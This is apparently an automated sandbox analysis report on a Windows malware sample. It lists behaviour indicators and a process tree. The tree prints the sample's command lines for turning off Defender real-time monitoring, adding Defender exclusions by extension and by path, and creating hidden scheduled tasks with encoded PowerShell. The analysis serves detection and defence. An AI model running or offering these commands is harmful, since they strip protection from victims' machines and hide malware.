2624 | powershell.exe
2308 | powershell.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
Suspicious use of AdjustPrivilegeToken 63 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2572 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2736 | WMIC.exe
Token: SeSecurityPrivilege | 2736 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2736 | WMIC.exe
Token: SeLoadDriverPrivilege | 2736 | WMIC.exe
Token: SeSystemProfilePrivilege | 2736 | WMIC.exe
Token: SeSystemtimePrivilege | 2736 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 2736 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 2736 | WMIC.exe
Token: SeCreatePagefilePrivilege | 2736 | WMIC.exe
Token: SeBackupPrivilege | 2736 | WMIC.exe
Token: SeRestorePrivilege | 2736 | WMIC.exe
Token: SeShutdownPrivilege | 2736 | WMIC.exe
Token: SeDebugPrivilege | 2736 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2736 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 2736 | WMIC.exe
Token: SeUndockPrivilege | 2736 | WMIC.exe
Token: SeManageVolumePrivilege | 2736 | WMIC.exe
Token: 33 | 2736 | WMIC.exe
Token: 34 | 2736 | WMIC.exe
Token: 35 | 2736 | WMIC.exe
Token: SeDebugPrivilege | 2832 | powershell.EXE
Token: SeDebugPrivilege | 1376 | powershell.EXE
Token: SeDebugPrivilege | 1592 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 2204 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 2204 | WMIC.exe
Token: SeSecurityPrivilege | 2204 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2204 | WMIC.exe
Token: SeLoadDriverPrivilege | 2204 | WMIC.exe
Token: SeSystemtimePrivilege | 2204 | WMIC.exe
Token: SeBackupPrivilege | 2204 | WMIC.exe
Token: SeRestorePrivilege | 2204 | WMIC.exe
Token: SeShutdownPrivilege | 2204 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2204 | WMIC.exe
Token: SeUndockPrivilege | 2204 | WMIC.exe
Token: SeManageVolumePrivilege | 2204 | WMIC.exe
Token: SeDebugPrivilege | 1500 | powershell.EXE
Token: SeDebugPrivilege | 2624 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 1916 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1916 | WMIC.exe
Token: SeSecurityPrivilege | 1916 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1916 | WMIC.exe
Token: SeLoadDriverPrivilege | 1916 | WMIC.exe
Token: SeSystemtimePrivilege | 1916 | WMIC.exe
Token: SeBackupPrivilege | 1916 | WMIC.exe
Token: SeRestorePrivilege | 1916 | WMIC.exe
Token: SeShutdownPrivilege | 1916 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1916 | WMIC.exe
Token: SeUndockPrivilege | 1916 | WMIC.exe
Token: SeManageVolumePrivilege | 1916 | WMIC.exe
Token: SeDebugPrivilege | 2308 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 3040 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 3040 | WMIC.exe
Token: SeSecurityPrivilege | 3040 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3040 | WMIC.exe
Token: SeLoadDriverPrivilege | 3040 | WMIC.exe
Token: SeSystemtimePrivilege | 3040 | WMIC.exe
Token: SeBackupPrivilege | 3040 | WMIC.exe
Token: SeRestorePrivilege | 3040 | WMIC.exe
Token: SeShutdownPrivilege | 3040 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 3040 | WMIC.exe
Token: SeUndockPrivilege | 3040 | WMIC.exe
Token: SeManageVolumePrivilege | 3040 | WMIC.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 1992 wrote to memory of 2236 | 1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe | 28
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2236 wrote to memory of 2744 | 2236 | Install.exe | 29
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2744 wrote to memory of 2712 | 2744 | Install.exe | 31
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2712 wrote to memory of 2864 | 2712 | forfiles.exe | 33
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2864 wrote to memory of 2572 | 2864 | cmd.exe | 34
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2572 wrote to memory of 2736 | 2572 | powershell.exe | 35
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2744 wrote to memory of 2436 | 2744 | Install.exe | 36
PID 2024 wrote to memory of 2032 | 2024 | taskeng.exe | 41
PID 2024 wrote to memory of 2032 | 2024 | taskeng.exe | 41
PID 2024 wrote to memory of 2032 | 2024 | taskeng.exe | 41
PID 2024 wrote to memory of 2032 | 2024 | taskeng.exe | 41
PID 2032 wrote to memory of 1932 | 2032 | zxpwdlP.exe | 42
PID 2032 wrote to memory of 1932 | 2032 | zxpwdlP.exe | 42
PID 2032 wrote to memory of 1932 | 2032 | zxpwdlP.exe | 42
PID 2032 wrote to memory of 1932 | 2032 | zxpwdlP.exe | 42
PID 2032 wrote to memory of 2792 | 2032 | zxpwdlP.exe | 44
PID 2032 wrote to memory of 2792 | 2032 | zxpwdlP.exe | 44
PID 2032 wrote to memory of 2792 | 2032 | zxpwdlP.exe | 44
PID 2032 wrote to memory of 2792 | 2032 | zxpwdlP.exe | 44
PID 1656 wrote to memory of 2832 | 1656 | taskeng.exe | 47
PID 1656 wrote to memory of 2832 | 1656 | taskeng.exe | 47
PID 1656 wrote to memory of 2832 | 1656 | taskeng.exe | 47
Processes

[1] C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe (PID 1992)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7zS1A83.tmp\Install.exe (PID 2236)
      cmdline: .\Install.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS1EE6.tmp\Install.exe (PID 2744)
        cmdline: .\Install.exe /iLdidEHGZ "525403" /S
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Loads dropped DLL
        - Enumerates system info in registry
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\forfiles.exe (PID 2712)
          cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe (PID 2864)
            cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2572)
              cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              - Command and Scripting Interpreter: PowerShell
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2736)
                cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\schtasks.exe (PID 2436)
          cmdline: schtasks /CREATE /TN "brlogsXZdQLKJRjYtj" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe\" OF /KgdidrG 525403 /S" /V1 /F
          - Drops file in Windows directory
          - Scheduled Task/Job: Scheduled Task
      [4] C:\Windows\SysWOW64\WerFault.exe (PID 1720)
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 504
          - Loads dropped DLL
          - Program crash

[1] C:\Windows\system32\taskeng.exe (PID 2024)
    cmdline: taskeng.exe {9F66153D-A706-4186-9A8C-3E56C053AED2} S-1-5-18:NT AUTHORITY\System:Service:
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe (PID 2032)
      cmdline: C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe OF /KgdidrG 525403 /S
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1932)
        cmdline: schtasks /CREATE /TN "giIFGvDdF" /SC once /ST 02:33:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force; the same value is reused by every later -EncodedCommand in this tree, matching the gpupdate.exe /force children seen under taskeng.exe PID 1656)
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2792)
        cmdline: schtasks /run /I /tn "giIFGvDdF"
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1904)
        cmdline: schtasks /DELETE /F /TN "giIFGvDdF"
    [3] C:\Windows\SysWOW64\cmd.exe (PID 1496)
        cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 408)
          cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\cmd.exe (PID 836)
        cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 2880)
          cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2424)
        cmdline: schtasks /CREATE /TN "gZgEDmWMy" /SC once /ST 04:28:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1064)
        cmdline: schtasks /run /I /tn "gZgEDmWMy"
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2116)
        cmdline: schtasks /DELETE /F /TN "gZgEDmWMy"
    [3] C:\Windows\SysWOW64\forfiles.exe (PID 2400)
        cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
      [4] C:\Windows\SysWOW64\cmd.exe (PID 2088)
          cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1592)
            cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2204)
              cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
              - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe (PID 3024)
        cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 3048)
          cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe (PID 3028)
        cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 3052)
          cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe (PID 1324)
        cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 1988)
          cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\cmd.exe (PID 1884)
        cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 1004)
          cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\cmd.exe (PID 2592)
        cmdline: cmd /C copy nul "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"
    [3] C:\Windows\SysWOW64\wscript.exe (PID 2812)
        cmdline: wscript "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"
        - Modifies data under HKEY_USERS
      [4] C:\Windows\SysWOW64\reg.exe (PID 2860)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2732)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2552)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2504)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2436)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2824)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2108)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 1676)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2768)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 1956)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2332)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 1204)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2676)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 1640)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 1932)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2680)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2260)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2308)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe (PID 2816)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 696)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 1468)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 1720)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 2304)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 484)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 2356)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 2984)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 852)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 1296)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 2420)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 1812)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 2856)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 2080)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 1124)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 1248)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
